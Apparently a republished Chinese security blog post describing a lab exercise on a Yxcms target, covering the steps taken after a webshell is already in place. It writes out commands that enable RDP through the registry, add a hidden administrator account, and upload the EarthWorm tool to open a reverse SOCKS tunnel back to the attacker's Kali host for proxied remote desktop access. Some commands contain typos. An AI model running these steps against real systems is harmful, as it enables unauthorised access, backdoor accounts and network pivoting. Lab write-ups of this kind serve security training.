Yxcms靶场 | 拿到web服务器权限

  • A+
所属分类:安全文章

Yxcms靶场 | 拿到web服务器权限

 

实验环境:

靶场:Windows 7  ip 192.168.100.50

 

靶场测试过程:

上回已经获取到webshell接下来拿到web服务器权限

 

1.查看端口开放情况是否具有可以利用的端口

命令:netstat –ano

发现没有可以让我们利用的端口

Yxcms靶场 | 拿到web服务器权限

2. 所以我们主动开启 3389 端口

命令:

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnectio ns /t REG_DWORD /d 0 /f

netstat –ano 查看 3389 是否成功开启界面显示 3389 成功开启

Yxcms靶场 | 拿到web服务器权限

3.创建一个隐藏的用户作为远程桌面登陆的用户

命令:net user hk$ 123.com /add

net localgroup administrtors hk$ /add net user hk$

创建一个 hk 的隐藏用户密码为 123.com 将 hk$这个隐藏用户移入到超级管理组查看 hk$用户是否成功创建

Yxcms靶场 | 拿到web服务器权限

4.使用虚拟终端查看 web 服务器真实IP 地址命令:ipconfig

Yxcms靶场 | 拿到web服务器权限

5.使用 kali 尝试远程桌面连接

命令:rdesktop 192.168.100.150

结果无法连接 可能使防火墙进行了端口拦截

Yxcms靶场 | 拿到web服务器权限

6.尝试利用蚁剑对web 服务器进行端口转发或者代理转发

注意:一定要先在攻击机上监听端口然后在使用靶机的 shell 去反弹端口

a.因为考虑到需要对内网进行端口扫描所以本人采用代理转发

b.并且 web 服务器只对外发布了 80 端口所以使用反向代理

c.利用蚁剑上传 ew 软件到 web 服务器的可读可写可执行的文件夹内我采用 temp 目录

路径:C:/windows/temp

Yxcms靶场 | 拿到web服务器权限

7.先在 kali 上监听一个本机的端口的比如 8888

命令:cd ew 进入的 ew 软件的目录

ls显示当前目录下的所有文件

ls –l 查看文件有没有执行权限 如果没有可以使用 chmond 777 * 在添加权限

./ew_for_linux64 -s rcsocks-l 1080 -e 8888 执行监听程序监听本机的 8888 端口并且将结果转到本机的 1080 端口

Yxcms靶场 | 拿到web服务器权限

8.虚拟终端执行 ew 软件将代理反弹到kali 当中

命令:cd../../.. 因为当前在 php 的路径下所以需要退到 C 盘的路径cd windows/temp 切换的 windows/temp 目录

dir 列出当前目录下的所有文件

Yxcms靶场 | 拿到web服务器权限

命令:ew_for_Win.exe -s rssocks -d 192.168.100.143 -e 8888

空显示就证明执行成功

Yxcms靶场 | 拿到web服务器权限

9.配置 kali 中的 proxychains 文件后尝试远程连接路径:/etc/proxychains.conf

命令:vim /etc/proxychains.conf

使用socks5 的协议 监听本机的 1080 端口

Yxcms靶场 | 拿到web服务器权限

命令:proxychains rdesktop 172.16.1.10

使用代理远程连接 web 服务器的真实IP 地址

Yxcms靶场 | 拿到web服务器权限

 

明天接着更!!

 



关于我们:

北京路劲科技有限公司(Beijing Lujin Technology Co. , Ltd.)成立于2019年1月4日,是一家提供全面系统集成与信息安全解决方案的专业IT技术服务公司。公司秉承“为网络安全保驾护航”的企业愿景及“提升国家整体安全”的使命,依据风险评估模型和等级保护标准,采用大数据等技术手段,开展网络安全相关业务。公司致力于为各个行业的业务信息化提供软件和通用解决方案、系统架构,系统管理和数据安全服务、以及IT咨询规划、系统集成与系统服务等专业化服务。公司立足北京,走向全国,始终坚持“换位、细节、感恩”的核心价值观,以“共赢、共享、共成长”的经营理念为出发点,集合了一批敢于创新、充满活力、热衷于为IT行业服务的优秀人才,致力于成为您身边的网络安全专家。


关注路劲科技,关注网络安全!

公司:北京路劲科技有限公司

地址:北京市昌平区南邵镇双营西路78号院2号楼5层504


本文始发于微信公众号(LSCteam):Yxcms靶场 | 拿到web服务器权限

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: